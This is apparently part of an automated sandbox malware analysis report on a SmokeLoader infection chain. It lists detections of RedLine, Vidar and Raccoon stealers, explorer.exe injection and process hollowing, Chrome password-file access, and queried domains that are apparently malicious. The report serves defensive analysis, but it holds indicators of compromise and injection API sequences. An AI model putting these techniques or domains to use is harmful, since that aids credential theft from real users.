Source: C:\Windows\explorer.exe	Domain query: nusurtal4f.net
Source: C:\Windows\explorer.exe	Domain query: privacytoolzforyou-6000.top
Source: C:\Windows\explorer.exe	Domain query: hajezey1.top
Source: C:\Windows\explorer.exe	Domain query: sysaheu90.top

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: C066.exe.10.dr

Jump to dropped file

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Md0q201V1D.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write			Jump to behavior
Source: C:\Users\user\Desktop\Md0q201V1D.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read			Jump to behavior
Source: C:\Users\user\AppData\Roaming\gbhudtb	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\gbhudtb	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EBBE.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\EBBE.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\gbhudtb	Memory written: C:\Users\user\AppData\Roaming\gbhudtb base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\gbhudtb	Memory written: C:\Users\user\AppData\Roaming\gbhudtb base: 400000 value starts with: 4D5A			Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Roaming\gbhudtb

Code function: 14_2_02BE0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,

14_2_02BE0110

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\Md0q201V1D.exe	Thread created: C:\Windows\explorer.exe EIP: 4DE1920			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21.exe	Thread created: unknown EIP: 2D61920			Jump to behavior
Source: C:\Users\user\AppData\Roaming\gbhudtb	Thread created: unknown EIP: 5B71920			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Thread created: unknown EIP: 5AB19C0			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EBBE.exe	Thread created: unknown EIP: 5B01920

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\B096.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe base address: 400000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe base address: 400000			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\Md0q201V1D.exe	Process created: C:\Users\user\Desktop\Md0q201V1D.exe 'C:\Users\user\Desktop\Md0q201V1D.exe'			Jump to behavior
Source: C:\Users\user\AppData\Roaming\gbhudtb	Process created: C:\Users\user\AppData\Roaming\gbhudtb C:\Users\user\AppData\Roaming\gbhudtb			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21.exe	Process created: C:\Users\user\AppData\Local\Temp\21.exe C:\Users\user\AppData\Local\Temp\21.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\gbhudtb	Process created: C:\Users\user\AppData\Roaming\gbhudtb C:\Users\user\AppData\Roaming\gbhudtb			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process created: C:\Users\user\AppData\Local\Temp\DF3A.exe C:\Users\user\AppData\Local\Temp\DF3A.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ServiceModelReg.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ServiceModelReg.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'

Contains functionality to create a new security descriptor

Source: C:\Users\user\AppData\Local\Temp\CBF0.exe

Code function: 29_2_6B57E730 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,

29_2_6B57E730

May try to detect the Windows Explorer process (often used for injection)

Source: explorer.exe, 0000000A.00000000.297850308.00000000011E0000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000000A.00000000.297627398.0000000000B68000.00000004.00000020.sdmp	Binary or memory string: Progman\Pr
Source: explorer.exe, 0000000A.00000000.297850308.00000000011E0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000A.00000000.297850308.00000000011E0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000A.00000000.297850308.00000000011E0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000000A.00000000.302532259.0000000008778000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWndh

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\B096.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\B096.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\BBE1.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DF3A.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DF3A.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation

Queries the cryptographic machine GUID

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Contains functionality to query local / system time

Source: C:\Users\user\Desktop\Md0q201V1D.exe

Code function: 0_2_00421CF0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00421CF0

Contains functionality to query windows version

Source: C:\Users\user\AppData\Local\Temp\CBF0.exe

Code function: 29_2_6B574020 RtlGetVersion,RtlGetSuiteMask,RtlGetNtProductType,RtlInitUnicodeString,ZwQueryLicenseValue,RtlGetSuiteMask,RtlGetVersion,

29_2_6B574020

Stealing of Sensitive Information:

Yara detected RedLine Stealer

Source: Yara match	File source: 40.0.ServiceModelReg.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.0.ServiceModelReg.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.0.DF3A.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.0.ServiceModelReg.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.0.DF3A.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.0.DF3A.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.0.ServiceModelReg.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.0.ServiceModelReg.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.aspnet_state.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.B096.exe.4426e00.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.B096.exe.4446e20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.0.DF3A.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.0.aspnet_state.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.0.aspnet_state.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.ServiceModelReg.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.0.aspnet_state.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.0.aspnet_state.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.B096.exe.4446e20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.0.aspnet_state.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.0.DF3A.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.B096.exe.4426e00.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000027.00000000.489693993.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000000.488918061.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000000.483819247.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.507631653.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.439226875.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000000.480873861.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.438304869.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.439894383.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.440496476.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000000.488076798.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000000.483001107.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.503371064.0000000003E09000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.466743057.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000000.484896100.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000000.487377447.0000000000402000.00000040.00000001.sdmp, type: MEMORY

Yara detected Vidar

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected SmokeLoader

Source: Yara match	File source: 29.3.CBF0.exe.3080000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.21.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.1.gbhudtb.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.CBF0.exe.3070e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.CBF0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.Md0q201V1D.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Md0q201V1D.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.gbhudtb.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.21.exe.2cc15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Md0q201V1D.exe.2d815a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.1.21.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.gbhudtb.2cb15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.gbhudtb.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.gbhudtb.2be15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.21.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.1.gbhudtb.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.21.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.21.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000000.326584645.0000000004DE1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.400930179.0000000002061000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.400697119.0000000000580000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.438106147.0000000003080000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.449845582.0000000000561000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.449446646.0000000000530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.338103224.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.481901309.00000000048F1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.453324146.00000000031C1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.453199313.0000000003090000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.338316447.0000000001F91000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.480747015.0000000002D30000.00000004.00000001.sdmp, type: MEMORY

Yara detected Raccoon Stealer

Source: Yara match	File source: 35.3.C066.exe.4960000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.C066.exe.4960000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000003.479598454.0000000004960000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: C066.exe PID: 5604, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\C066.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\C066.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Remote Access Functionality:

Yara detected RedLine Stealer

Source: Yara match	File source: 40.0.ServiceModelReg.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.0.ServiceModelReg.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.0.DF3A.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.0.ServiceModelReg.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.0.DF3A.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.0.DF3A.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.0.ServiceModelReg.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.0.ServiceModelReg.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.aspnet_state.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.B096.exe.4426e00.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.B096.exe.4446e20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.0.DF3A.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.0.aspnet_state.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.0.aspnet_state.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.ServiceModelReg.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.0.aspnet_state.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.0.aspnet_state.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.B096.exe.4446e20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.0.aspnet_state.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.0.DF3A.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.B096.exe.4426e00.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000027.00000000.489693993.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000000.488918061.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000000.483819247.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.507631653.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.439226875.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000000.480873861.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.438304869.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.439894383.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.440496476.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000000.488076798.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000000.483001107.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.503371064.0000000003E09000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.466743057.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000000.484896100.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000000.487377447.0000000000402000.00000040.00000001.sdmp, type: MEMORY

Yara detected Vidar

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected SmokeLoader

Source: Yara match	File source: 29.3.CBF0.exe.3080000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.21.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.1.gbhudtb.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.CBF0.exe.3070e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.CBF0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.Md0q201V1D.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Md0q201V1D.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.gbhudtb.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.21.exe.2cc15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Md0q201V1D.exe.2d815a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.1.21.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.gbhudtb.2cb15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.gbhudtb.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.gbhudtb.2be15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.21.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.1.gbhudtb.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.21.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.21.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000000.326584645.0000000004DE1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.400930179.0000000002061000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.400697119.0000000000580000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.438106147.0000000003080000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.449845582.0000000000561000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.449446646.0000000000530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.338103224.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.481901309.00000000048F1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.453324146.00000000031C1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.453199313.0000000003090000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.338316447.0000000001F91000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.480747015.0000000002D30000.00000004.00000001.sdmp, type: MEMORY

Yara detected Raccoon Stealer

Source: Yara match	File source: 35.3.C066.exe.4960000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.C066.exe.4960000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000003.479598454.0000000004960000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: C066.exe PID: 5604, type: MEMORYSTR